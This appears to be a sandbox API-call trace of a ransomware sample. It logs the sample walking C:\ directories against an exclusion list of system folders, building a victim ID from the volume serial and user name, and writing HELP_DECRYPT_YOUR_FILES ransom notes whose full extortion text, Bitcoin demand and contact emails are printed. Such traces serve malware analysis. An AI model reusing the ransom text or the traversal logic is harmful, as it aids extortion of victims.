	[0157.633] wsprintfA (in: param_1=0x18d978, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0157.633] CreateFileW (lpFileName="C:\\Documents and Settings\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\documents and settings\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.633] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0157.634] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0157.634] WriteFile (in: hFile=0x378, lpBuffer=0x18d978*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18da90, lpOverlapped=0x0 | out: lpBuffer=0x18d978*, lpNumberOfBytesWritten=0x18da90*=0x43, lpOverlapped=0x0) returned 1
	[0157.634] CloseHandle (hObject=0x378) returned 1
	[0157.634] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*" (normalized: "c:\\documents and settings\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x77758e55, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xffffffff
	[0157.634] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0157.635] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x776c0700, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x776c0700, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x776c0700, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0157.635] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77699f71, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x77699f71, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x77699f71, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0157.635] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x551dbbfd, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x551dbbfd, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x6b494f65, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1
	[0157.635] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0x198b0d8f, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x198b0d8f, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x198b0d8f, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="MSOCache", cAlternateFileName="")) returned 1
	[0157.635] lstrcmpW (lpString1="MSOCache", lpString2="..") returned 1
	[0157.635] lstrcmpW (lpString1="MSOCache", lpString2=".") returned 1
	[0157.635] lstrcpyW (in: lpString1=0x18e9cc, lpString2="C:" | out: lpString1="C:") returned="C:"
	[0157.635] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\"
	[0157.635] lstrcatW (in: lpString1="C:\\", lpString2="MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache"
	[0157.636] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache"
	[0157.636] lstrcatW (in: lpString1="C:\\MSOCache", lpString2="\\" | out: lpString1="C:\\MSOCache\\") returned="C:\\MSOCache\\"
	[0157.636] lstrcpyW (in: lpString1=0x18dab4, lpString2="C:\\MSOCache\\" | out: lpString1="C:\\MSOCache\\") returned="C:\\MSOCache\\"
	[0157.636] lstrcatW (in: lpString1="C:\\MSOCache\\", lpString2="*.*" | out: lpString1="C:\\MSOCache\\*.*") returned="C:\\MSOCache\\*.*"
	[0157.636] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*.*" (normalized: "c:\\msocache\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0x198b0d8f, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x198b0d8f, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x198b0d8f, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0157.636] lstrlenW (lpString="C:\\MSOCache\\*.*") returned 15
	[0157.637] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.637] CharLowerBuffW (in: lpsz="C:\\MSOCache\\*.*", cchLength=0xf | out: lpsz="c:\\msocache\\*.*") returned 0xf
	[0157.637] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.637] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="windows") returned 0x0
	[0157.637] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.637] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="boot") returned 0x0
	[0157.638] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.638] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="system volume information") returned 0x0
	[0157.638] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.638] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0157.638] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.638] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="temp") returned 0x0
	[0157.638] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.639] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="program files") returned 0x0
	[0157.639] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.639] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="program files (x86)") returned 0x0
	[0157.639] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.639] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="appdata") returned 0x0
	[0157.639] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.639] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="application data") returned 0x0
	[0157.639] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.640] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="winnt") returned 0x0
	[0157.640] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.640] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="tmp") returned 0x0
	[0157.640] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.640] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="cache") returned="cache\\*.*"
	[0157.640] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0157.641] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache"
	[0157.641] lstrcatW (in: lpString1="C:\\MSOCache", lpString2="\\*.*" | out: lpString1="C:\\MSOCache\\*.*") returned="C:\\MSOCache\\*.*"
	[0157.641] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0157.641] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0157.641] wsprintfW (in: param_1=0x18d7b0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\MSOCache\\HELP_DECRYPT_YOUR_FILES.TXT") returned 39
	[0157.641] CreateFileW (lpFileName="C:\\MSOCache\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\msocache\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.650] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0157.650] WriteFile (in: hFile=0x378, lpBuffer=0x18cb68*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18da8c, lpOverlapped=0x0 | out: lpBuffer=0x18cb68*, lpNumberOfBytesWritten=0x18da8c*=0xc46, lpOverlapped=0x0) returned 1
	[0157.655] CloseHandle (hObject=0x378) returned 1
	[0157.655] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cb38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cb38*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0157.656] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0157.656] GetUserNameA (in: lpBuffer=0x18ca1c, pcbBuffer=0x18cb34 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cb34) returned 1
	[0157.657] wsprintfW (in: param_1=0x18d9b8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0157.657] CreateFileW (lpFileName="C:\\MSOCache\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\msocache\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.658] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0157.658] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0157.658] WriteFile (in: hFile=0x378, lpBuffer=0x18d9b8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18da94, lpOverlapped=0x0 | out: lpBuffer=0x18d9b8*, lpNumberOfBytesWritten=0x18da94*=0x30, lpOverlapped=0x0) returned 1
	[0157.658] CloseHandle (hObject=0x378) returned 1
	[0157.659] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0157.659] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0157.659] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0157.660] wsprintfW (in: param_1=0x18d770, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\MSOCache\\HELP_DECRYPT_YOUR_FILES.HTML") returned 40
	[0157.660] CreateFileW (lpFileName="C:\\MSOCache\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\msocache\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.664] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0157.664] WriteFile (in: hFile=0x378, lpBuffer=0x18cf64*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18da88, lpOverlapped=0x0 | out: lpBuffer=0x18cf64*, lpNumberOfBytesWritten=0x18da88*=0x808, lpOverlapped=0x0) returned 1
	[0157.667] CloseHandle (hObject=0x378) returned 1
	[0157.667] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0157.668] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cf4c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cf4c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0157.668] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0157.668] GetUserNameA (in: lpBuffer=0x18ce30, pcbBuffer=0x18cf48 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cf48) returned 1
	[0157.670] wsprintfA (in: param_1=0x18d978, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0157.670] CreateFileW (lpFileName="C:\\MSOCache\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\msocache\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.670] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0157.670] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0157.670] WriteFile (in: hFile=0x378, lpBuffer=0x18d978*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18da90, lpOverlapped=0x0 | out: lpBuffer=0x18d978*, lpNumberOfBytesWritten=0x18da90*=0x43, lpOverlapped=0x0) returned 1
	[0157.671] CloseHandle (hObject=0x378) returned 1
	[0157.671] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*.*" (normalized: "c:\\msocache\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0x198b0d8f, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x198b0d8f, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x77817897, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0157.671] lstrlenW (lpString="C:\\MSOCache\\*.*") returned 15
	[0157.671] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.672] CharLowerBuffW (in: lpsz="C:\\MSOCache\\*.*", cchLength=0xf | out: lpsz="c:\\msocache\\*.*") returned 0xf
	[0157.672] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.672] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="windows") returned 0x0
	[0157.672] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.672] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="boot") returned 0x0
	[0157.672] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.672] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="system volume information") returned 0x0
	[0157.672] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.673] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0157.673] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.694] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="temp") returned 0x0
	[0157.694] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.694] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="program files") returned 0x0
	[0157.694] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.694] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="program files (x86)") returned 0x0
	[0157.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.695] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="appdata") returned 0x0
	[0157.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.695] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="application data") returned 0x0
	[0157.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.695] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="winnt") returned 0x0
	[0157.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.696] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="tmp") returned 0x0
	[0157.696] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.696] StrStrW (lpFirst="c:\\msocache\\*.*", lpSrch="cache") returned="cache\\*.*"
	[0157.696] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0157.696] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x85890a37, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x85890a37, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x6c2d42c9, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x48000000, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="pagefile.sys", cAlternateFileName="")) returned 1
	[0157.696] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="PerfLogs", cAlternateFileName="")) returned 1
	[0157.696] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1
	[0157.697] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1
	[0157.697] lstrcpyW (in: lpString1=0x18e9cc, lpString2="C:" | out: lpString1="C:") returned="C:"
	[0157.697] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\"
	[0157.697] lstrcatW (in: lpString1="C:\\", lpString2="PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs"
	[0157.697] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs"
	[0157.697] lstrcatW (in: lpString1="C:\\PerfLogs", lpString2="\\" | out: lpString1="C:\\PerfLogs\\") returned="C:\\PerfLogs\\"
	[0157.697] lstrcpyW (in: lpString1=0x18dab4, lpString2="C:\\PerfLogs\\" | out: lpString1="C:\\PerfLogs\\") returned="C:\\PerfLogs\\"
	[0157.697] lstrcatW (in: lpString1="C:\\PerfLogs\\", lpString2="*.*" | out: lpString1="C:\\PerfLogs\\*.*") returned="C:\\PerfLogs\\*.*"
	[0157.697] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*" (normalized: "c:\\perflogs\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9ab0
	[0157.698] lstrlenW (lpString="C:\\PerfLogs\\*.*") returned 15
	[0157.698] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.698] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\*.*", cchLength=0xf | out: lpsz="c:\\perflogs\\*.*") returned 0xf
	[0157.698] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.699] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="windows") returned 0x0
	[0157.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.699] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="boot") returned 0x0
	[0157.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.699] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="system volume information") returned 0x0
	[0157.699] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.699] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0157.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.700] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="temp") returned 0x0
	[0157.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.700] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="program files") returned 0x0
	[0157.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.700] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="program files (x86)") returned 0x0
	[0157.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.701] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="appdata") returned 0x0
	[0157.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.701] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="application data") returned 0x0
	[0157.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.701] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="winnt") returned 0x0
	[0157.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.701] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="tmp") returned 0x0
	[0157.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.702] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="cache") returned 0x0
	[0157.702] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.702] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="temporary internet files") returned 0x0
	[0157.702] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.702] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="webcache") returned 0x0
	[0157.702] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.702] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="inetcache") returned 0x0
	[0157.702] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.703] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="nvidia") returned 0x0
	[0157.703] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.703] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="packages") returned 0x0
	[0157.703] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.703] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="cookies") returned 0x0
	[0157.703] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.703] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="programdata") returned 0x0
	[0157.704] FindNextFileW (in: hFindFile=0xfb9ab0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
